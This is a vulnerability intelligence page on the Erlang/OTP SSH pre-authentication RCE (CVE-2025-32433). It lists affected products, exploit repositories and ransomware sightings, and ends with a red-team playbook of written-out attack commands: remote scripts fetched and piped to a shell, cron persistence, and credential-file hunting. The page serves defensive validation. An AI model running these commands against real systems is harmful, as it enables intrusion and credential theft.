CVE-2025-32433
Overview
This vulnerability is an authentication bypass in the SSH server component of Erlang/OTP caused by improper handling of SSH protocol messages. Specifically, the SSH server fails to correctly validate incoming protocol messages, allowing unauthenticated remote actors to manipulate message processing flow. The flaw resides in the SSH server implementation within the Erlang/OTP libraries prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, affecting the SSH protocol message parser and authentication logic.
Vulnerability Description
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
Impact
An unauthenticated attacker can remotely execute arbitrary commands on affected systems by exploiting the SSH server without any credentials or user interaction. This leads to full system compromise, enabling data exfiltration, installation of persistent malware, or lateral movement within a network. The vulnerability allows complete control over the target host through the compromised SSH service, posing critical threats to confidentiality, integrity, and availability of affected environments.
Solution
Upgrade Erlang/OTP to versions OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 as specified in the official Erlang/OTP security advisory GHSA-37cp-fgq5-7wc2. Detailed patch instructions and source code fixes are available at the Erlang GitHub repository commits 0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12 and 6eef04130afc8b0ccb63c9a0d8650209cf54892f. As a temporary workaround, disable the SSH server or restrict access via firewall rules until patching is applied.
EPSS vs KEV Prediction — Evolution (30 days)
Affected Products (34)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Erlang | Erlang\/otp | All |
cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
|
|
|
Erlang | Erlang\/otp | All |
cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
|
|
|
Erlang | Erlang\/otp | All |
cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Confd Basic | All |
cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Network Services Orchestrator | All |
cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
|
|
|
Cisco | Cloud Native Broadband Network Gateway | All |
cpe:2.3:a:cisco:cloud_native_broadband_network_gateway:*:*:*:*:*:*:*:*
|
|
|
Cisco | Inode Manager | N/A |
cpe:2.3:a:cisco:inode_manager:-:*:*:*:*:*:*:*
|
|
|
Cisco | Smart Phy | All |
cpe:2.3:a:cisco:smart_phy:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ultra Packet Core | All |
cpe:2.3:a:cisco:ultra_packet_core:*:*:*:*:*:*:*:*
|
|
|
Cisco | Ultra Services Platform | N/A |
cpe:2.3:a:cisco:ultra_services_platform:-:*:*:*:*:*:*:*
|
|
|
Cisco | Staros | All |
cpe:2.3:o:cisco:staros:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Erlang OTP Pre-Auth RCE Scanner and Exploit
exploits/linux/ssh/ssh_erlangotp_rce
|
Horizon3 Attack Team, Matt Keeley, Martin Kristiansen +1 | Unknown | - | View |
GitHub PoCs (47)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ProDefense/CVE-2025-32433
CVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2
|
ProDefense | 142 | 27 | 2025-04-18 | View |
|
omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC
The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without p...
|
omer-efe-curkus | 16 | 2 | 2025-04-18 | View |
|
NiteeshPujari/CVE-2025-32433-PoC
CVE-2025-32433 PoC: Unauthenticated Remote Code Execution (RCE) in Erlang/OTP SSH. A proof-of-concept exploit for CVE-20...
|
NiteeshPujari | 7 | 1 | 2025-08-13 | View |
|
m0usem0use/erl_mouse
python script to find vulnerable targets of CVE-2025-32433
|
m0usem0use | 6 | 2 | 2025-04-18 | View |
|
0xPThree/cve-2025-32433
|
0xPThree | 6 | 1 | 2025-04-19 | View |
|
ekomsSavior/POC_CVE-2025-32433
|
ekomsSavior | 4 | 2 | 2025-04-18 | View |
|
yonathanpy/CVE-2025-32433.py
CVE-2025-32433 PoC – SSH Protocol Python-based PoC for controlled lab testing of SSH message handling, channel operation...
|
yonathanpy | 3 | 1 | 2026-02-26 | View |
|
exa-offsec/ssh_erlangotp_rce
Exploitation module for CVE-2025-32433 (Erlang/OTP)
|
exa-offsec | 3 | 1 | 2025-04-18 | View |
|
abrewer251/CVE-2025-32433_Erlang-OTP_PoC
This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems runnin...
|
abrewer251 | 1 | 2 | 2025-04-29 | View |
|
AntonieSoga/Erlang-OTP-PoC_CVE-2025-32433
|
AntonieSoga | 2 | 1 | 2025-12-29 | View |
|
0x7556/CVE-2025-32433
CVE-2025-32433 Erlang/OTP SSH RCE Exploit SSH远程代码执行漏洞EXP
|
0x7556 | 3 | 0 | 2025-04-25 | View |
|
Yuri08loveElaina/CVE-2025-32433-Erlang-OTP-SSH-Pre-Auth-RCE-exploit
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and O...
|
Yuri08loveElaina | 2 | 1 | 2025-06-15 | View |
|
darses/CVE-2025-32433
Security research on Erlang/OTP SSH CVE-2025-32433.
|
darses | 3 | 0 | 2025-04-18 | View |
|
LemieOne/CVE-2025-32433
Missing Authentication for Critical Function (CWE-306)-Exploit
|
LemieOne | 3 | 0 | 2025-04-18 | View |
|
joshuavanderpoll/cve-2025-32433
Go PoC for CVE-2025-32433 — unauthenticated RCE in Erlang/OTP SSH.
|
joshuavanderpoll | 3 | 0 | 2026-03-07 | View |
|
toshithh/CVE-2025-32433
|
toshithh | 2 | 0 | 2025-10-20 | View |
|
dollarboysushil/CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE
PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message...
|
dollarboysushil | 2 | 0 | 2025-09-07 | View |
|
mirmeweu/cve-2025-32433
the task from C*****k
|
mirmeweu | 2 | 0 | 2025-09-24 | View |
|
MrDreamReal/CVE-2025-32433
CVE-2025-32433 Summary and Attack Overview
|
MrDreamReal | 0 | 2 | 2025-04-27 | View |
|
teamtopkarl/CVE-2025-32433
Erlang/OTP SSH 远程代码执行漏洞
|
teamtopkarl | 1 | 0 | 2025-04-18 | View |
|
becrevex/CVE-2025-32433
Erlang OTP SSH NSE Discovery Script
|
becrevex | 1 | 0 | 2025-04-25 | View |
|
bilalz5-github/Erlang-OTP-SSH-CVE-2025-32433
CVE-2025-32433 – Erlang/OTP SSH vulnerability allowing pre-auth RCE
|
bilalz5-github | 1 | 0 | 2025-05-02 | View |
|
iteride/CVE-2025-32433
test
|
iteride | 1 | 0 | 2025-09-18 | View |
|
Know56/CVE-2025-32433
CVE-2025-32433 is a vuln of ssh
|
Know56 | 1 | 0 | 2025-04-28 | View |
|
X-Bulow/Reproduce-CVE-2025-32433
|
X-Bulow | 0 | 0 | 2026-09-27 | View |
|
damnkrishna/CVE-2025-32433-LAB
A Flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execut...
|
damnkrishna | 0 | 0 | 2026-09-18 | View |
|
Batman529/PoC-CVE-2025-32433
These is a PoC for the CVE-2025-32433 vulnerability, do NOT test on systems that you dont own!!!
|
Batman529 | 0 | 0 | 2025-10-19 | View |
|
Liam-Worsley/CVE-2025-32433-PoC-Analysis
This is an analysis for CVE-2025-32433 (Erlang OTP SSH Vulnerability). I did not write any of the code, I only wrote com...
|
Liam-Worsley | 0 | 0 | 2026-08-14 | View |
|
razureink/cve-2025-32433-erlang_ssh_rce_reproduction
Reproduction of cve-2025-32433-erlang_ssh_rce_reproduction
|
razureink | 0 | 0 | 2026-07-24 | View |
|
dampedcoast/Exploiting-a-vulnerability-using-reverse-shell
This project simulates a real-world attack-and-defend scenario across two virtual machines. You will exploit a critical ...
|
dampedcoast | 0 | 0 | 2026-06-12 | View |
|
chuzouX/CVE-2025-32433-Exploit-edited
Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unic...
|
chuzouX | 0 | 0 | 2026-06-08 | View |
|
leehunkoo/hk_CVE-2025-32433
|
leehunkoo | 0 | 0 | 2026-06-03 | View |
|
l1nuxkid/CVE-2025-32433-exploit
|
l1nuxkid | 0 | 0 | 2025-11-08 | View |
|
0xBlackash/CVE-2025-32433
CVE-2025-32433
|
0xBlackash | 0 | 0 | 2026-04-09 | View |
|
ps-interactive/lab_CVE-2025-32433
CVE lab to accompany CVE course for CVE-2025-32433
|
ps-interactive | 0 | 0 | 2025-04-24 | View |
|
ODST-Forge/CVE-2025-32433_PoC
This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems runnin...
|
ODST-Forge | 0 | 0 | 2025-04-29 | View |
|
vigilante-1337/CVE-2025-32433
A critical flaw has been discovered in Erlang/OTP's SSH server allows unauthenticated attackers to gain remote code exec...
|
vigilante-1337 | 0 | 0 | 2025-05-03 | View |
|
te0rwx/CVE-2025-32433-Detection
|
te0rwx | 0 | 0 | 2025-08-27 | View |
|
soltanali0/CVE-2025-32433-Eploit
Erlang/OTP SSH Vulnerable to Pre-Authentication RCE
|
soltanali0 | 0 | 0 | 2025-11-27 | View |
|
giriaryan694-a11y/cve-2025-32433_rce_exploit
This exploit script is designed to simplify exploitation of the Erlang/OTP SSH vulnerability CVE-2025-32433 in the TryHa...
|
giriaryan694-a11y | 0 | 0 | 2025-12-25 | View |
|
carlosalbertotuma/CVE-2025-32433
|
carlosalbertotuma | 0 | 0 | 2026-02-24 | View |
|
Mdusmandasthaheer/CVE-2025-32433
|
Mdusmandasthaheer | 0 | 0 | 2025-08-28 | View |
|
blackcat4347/CVE-2025-32433-available-for-windows
CVE-2025-32433-available-for-windows-victims
|
blackcat4347 | 0 | 0 | 2026-02-02 | View |
|
meloppeitreet/CVE-2025-32433-Remote-Shell
Go-based exploit for CVE-2025-32433
|
meloppeitreet | 0 | 0 | 2025-04-19 | View |
|
agustfricke/erlang-ssh-rce-CVE-2025-32433
|
agustfricke | 0 | 0 | 2026-03-03 | View |
|
C9b3rD3vi1/Erlang-OTP-SSH-CVE-2025-32433
Exploit Erlang/OTP SSH CVE-2025-32433 in a lab setup.
|
C9b3rD3vi1 | 0 | 0 | 2025-04-29 | View |
|
Epivalent/CVE-2025-32433-detection
|
Epivalent | 0 | 0 | 2025-04-18 | View |
Ransomware Groups 5
Threat Feed
39 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: ADFind, AnyDesk, BloodHound, Censys, CertiHound (868 known victims)
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, EDRSandBlast, EasyUpload.io, Evilginx, Kali Linux (2304 known victims)
Ransomware group known to exploit this vulnerability. Tools: ADFind, AnyDesk, BloodHound, Censys, CertiHound (868 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Mimikatz, PingCastle, SoftPerfect NetScan (652 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: ADFind, AnyDesk, BloodHound, Censys, CertiHound (868 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Active exploitation confirmed with 46 sighting(s)
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
62 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
for pid in $(pgrep -f 'Runner.Worker|Runner.Listener|runsvc|run.sh' 2>/dev/null); do tr '\0' '\n' < /proc/$pid/environ 2>/dev/null | grep -iE 'env|ssh'; done
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path} -maxdepth 6 -name "#{filename}" -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.aws/#{filename}' -type f 2>/dev/null
find #{file_path} -path '*/.azure/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.docker/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.config/gcloud/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /root -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find /etc/kubernetes -name '*.conf' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for filename in #{filenames}; do find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null; done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
for filename in #{filenames}; do
find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null
done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /etc/mysql -name 'my.cnf' -type f #{optional_flags} 2>/dev/null
find /etc/redis -name 'redis.conf' -type f #{optional_flags} 2>/dev/null
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.